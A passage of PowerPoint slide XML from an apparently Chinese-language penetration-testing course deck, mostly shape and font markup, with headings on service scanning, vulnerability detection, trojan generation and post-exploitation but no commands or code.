                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5090160"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5675630"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="6261100"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
